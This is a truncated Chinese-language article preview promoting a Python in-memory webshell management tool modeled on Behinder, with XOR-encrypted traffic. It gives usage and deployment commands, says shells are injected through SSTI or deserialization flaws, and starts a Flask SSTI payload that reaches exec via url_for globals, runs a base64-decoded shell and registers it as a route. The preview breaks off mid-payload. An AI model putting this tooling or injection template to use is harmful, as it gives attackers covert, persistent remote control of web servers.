文章预览
项目介绍 此工具是一款Python内存马管理工具, 实现的一些基本功能参照了冰蝎工具的设计, Payload的写法都依赖于Python自带的一些库实现,支持Windows/Linux,交互过程的流量加密是异或,主要通过 利用SSTI漏洞、 反序列化漏洞 注入内存马 工具使用 启动UI界面(缺啥模块pip一下) python3 MainUI .py 如果需要使用demo,可以使用ide或者python来启动,正式的环境部署命令为 uwsgi --http :5006 --gevent 1000 --http-websockets --master --wsgi-file app .py --callable app 修改demo中的app.py socketio = SocketIO(app, cors_allowed_origins= "*" , async_mode= 'gevent' ) generate_shell.py为生成base64编码的内存马函数,需要通过SSTI或者反序列化漏洞来进行注入 SSTI示例 {{ url_for.__globals_ _ [ '__builtins__' ][ 'exec' ]( " exec(__import__('base64').b64decode('Base64Shell')) app.view_functions['shell'] = shell_func; app._got_first_request=False; a
………………………………
